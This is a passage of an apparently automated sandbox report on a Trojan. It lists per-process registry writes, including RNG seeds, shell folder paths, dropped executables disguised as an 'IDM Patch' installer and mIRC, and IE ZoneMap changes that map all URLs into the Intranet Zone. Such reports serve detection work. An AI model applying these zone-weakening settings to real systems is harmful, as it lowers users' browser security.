[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their name, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process cgjrsnhu.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 A9 9C EF 08 99 F2 48 A1 8C 76 7B 66 DC 49 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process honmznj1.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 04 D4 27 80 D6 BC FB AF D0 D4 A6 D8 CF A4 DD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD C7 91 0D 9B 30 52 DB A5 CB A2 8A F5 91 34 1C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"FB_1.tmp.exe" = "FB_1.tmp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"FB_2.tmp.exe" = "IDM Patch 6.23.b.11 Installation"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 93 78 E3 2E 35 92 AD C8 6E 60 7C D7 A5 AE E4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process ping.exe:2120 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 32 27 28 F1 1C B8 92 9D CE 0A 81 48 19 8C 20"
The process ping.exe:268 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 03 BB AF 64 24 B2 81 D9 BE E5 9C 5B DF 9F C5"
The process ping.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 A5 AA 68 09 F3 97 F4 88 90 E7 D6 A6 18 B4 7D"
The process ping.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 E1 D9 27 79 54 4F 9E 08 72 07 DE CB 92 D0 C8"
The process ping.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 15 CC F3 36 A7 92 DC 01 4A 7E 55 DF 5B C3 80"
The process ping.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 CF 75 53 19 9A CF FF 82 1E 64 C9 47 D4 7F 37"
The process ping.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 43 65 5E 8B DC 28 B7 90 2D 0D FE 7E F3 3A 21"
The process ping.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 CA EB 84 FD 3E B3 C9 D6 0E 78 50 77 AB FB 54"
The process ping.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 FD 29 5C C5 96 F5 0B 47 38 43 56 7F C6 05 91"
The process cvtres.exe:4056 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 5D 27 D6 E6 79 B1 DD C6 5A ED 27 57 62 43 E3"
The process cvtres.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 2C C4 E4 9F F9 4A 1A 16 82 7A BF E7 AC 9A 69"
The process cvtres.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 15 22 C5 FA 30 3F 6E 26 19 C0 87 0B AB 69 55"
The process cvtres.exe:3340 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 B2 35 43 88 8F 6C 68 7A 91 32 30 83 8E 6C 1B"
The process cvtres.exe:3608 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 B7 AF 45 6A BB 1D C8 88 F7 44 CB 0E F9 07 B5"
The process cvtres.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 4E CB CA BD BB 0B 4B D5 84 49 75 21 3A 05 07"
The process cvtres.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 0E B3 77 F8 4A 7B 80 A2 62 02 9E 53 5D 60 51"
The process cvtres.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 5A 90 AE 25 FA 48 13 0C 47 90 6F A3 A1 02 4E"
The process system.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A A8 72 84 AD 24 FB 66 96 49 7F ED 5F 49 EA 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"xvnsxkn9.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 70 B0 38 1D CF D4 DE 9D 3E 5A A5 70 4C 59 E8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"bch_h8mn.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC D6 9A 9F 5B 8B 04 CE DB 44 60 34 FA 58 57 77"
The process system.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 05 FF 52 0D E1 19 2D 5D B5 19 4D 35 ED E4 E1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process system.exe:2688 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 72 05 6B D5 E7 24 8D CF A7 87 2F 75 2F DD A9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:\375569]
"svchost.exe" = "mIRC"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process system.exe:3312 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 61 8E 60 3E 35 78 D3 05 06 8D EB DD 4D BF EE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process system.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 0A 5C 61 A6 A0 A9 49 E6 63 9B 8F 52 5D 0B 7C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"honmznj1.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:376 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 2F F3 AF 15 FF EB 30 8D B9 E4 E7 A6 B8 48 52"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"cgjrsnhu.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process qrv670kf.exe:3256 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 DC 3F 08 69 F3 F7 3F A8 5A 39 AB 2F F9 04 80"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process qkjdmucq.exe:2752 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 61 1F 71 DC 56 1C 2D D8 16 7D 4B 6E E8 AA BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
